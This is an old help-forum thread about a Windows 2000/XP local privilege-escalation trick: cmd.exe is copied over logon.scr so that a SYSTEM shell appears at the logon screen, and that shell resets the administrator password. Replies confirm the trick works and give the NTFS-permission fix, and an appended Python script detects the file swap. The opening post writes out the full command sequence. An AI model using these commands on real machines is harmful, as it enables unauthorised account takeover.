Solved

I have a new exploit for you all to figure a way round

Posted on 2003-02-20
Last Modified: 2013-12-04
This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.


If you can log in as an account, drop to DOS (Start -> Run -> cmd). At the C: prompt, type the following (assuming default install locations):

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine. logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just do
C:\> net user administrator <newpassword>
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.


 
Credits:

Author:Will W.

 
Question by:wirehead203
11 Comments
 
LVL 9

Expert Comment

by:MSGeek
ID: 7989242
To clarify, you are looking for a way around this exploit?  It does not even sound like you are sure it works?
0
 
LVL 1

Expert Comment

by:craigtin
ID: 7995330
I think you answer your own question.  If you allow full permission to the system folders for users, why do you care if they can rename a file?
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 8009998
By the way, this exploit does work.  
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 8009999
By the way, this exploit does work.  
0
 
LVL 1

Accepted Solution

by:
craigtin earned 100 total points
ID: 8010072
Even if you restrict users' rights on the folders?
Then the command prompt must be using system privilege.
0
 
LVL 9

Assisted Solution

by:MSGeek
MSGeek earned 100 total points
ID: 8010251
If you change NTFS rights so they cannot del and copy (rename) the file, you're OK.  This will not work with default security settings for normal users in XP.  But it does in 2000 and 2000 Server.
0
 

Expert Comment

by:CleanupPing
ID: 9070888
wirehead203:
This old question needs to be finalized -- accept an answer, split points, or get a refund.  For information on your options, please click here-> http:/help/closing.jsp#1 
EXPERTS:
Post your closing recommendations!  No comment means you don't care.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 9073148
wirehead.. how'd you make out with this.  MSGeek.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 11349154
Thanks Modulo.  MSGeek
0
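
A defensive check for the file swap described in the question, added here as an example and not part of any post in the thread: it flags a logon.scr that is byte-identical to cmd.exe, a missing logon.scr, or a leftover logon.scr.old. The function names, the directory argument and the sample file contents are assumptions constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# File names come from the thread. The directory is an argument so the check
# can run against a live system directory or a copy taken for triage.
SCREENSAVER, SHELL, BACKUP = "logon.scr", "cmd.exe", "logon.scr.old"

def sha256_of(path):
    """Return the SHA-256 hex digest of a file's contents."""
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def find_name(directory, wanted):
    """Return the real path for `wanted`, matched case-insensitively like NTFS."""
    for entry in os.listdir(directory):
        if entry.lower() == wanted.lower():
            return os.path.join(directory, entry)
    return None

def check_logon_screensaver(directory):
    """Return a list of findings for the logon.scr swap described in the thread."""
    findings = []
    scr = find_name(directory, SCREENSAVER)
    shell = find_name(directory, SHELL)
    if scr is None:
        findings.append("logon.scr missing")
    elif shell is not None and sha256_of(scr) == sha256_of(shell):
        findings.append("logon.scr is byte-identical to cmd.exe")
    if find_name(directory, BACKUP) is not None:
        findings.append("logon.scr.old present (leftover backup copy)")
    return findings

def build_sample(swapped):
    """Constructed sample directory with placeholder contents (not real binaries)."""
    d = tempfile.mkdtemp()
    files = {"CMD.EXE": b"MZ shell placeholder", "logon.scr": b"MZ saver placeholder"}
    if swapped:
        files["logon.scr.old"] = files["logon.scr"]
        files["logon.scr"] = files["CMD.EXE"]
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d

if __name__ == "__main__":
    print("clean:  ", check_logon_screensaver(build_sample(swapped=False)))
    print("swapped:", check_logon_screensaver(build_sample(swapped=True)))
```

A clean result only means these three conditions were not met; it says nothing about the NTFS permissions on the folder, which is the fix given in the answers above.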
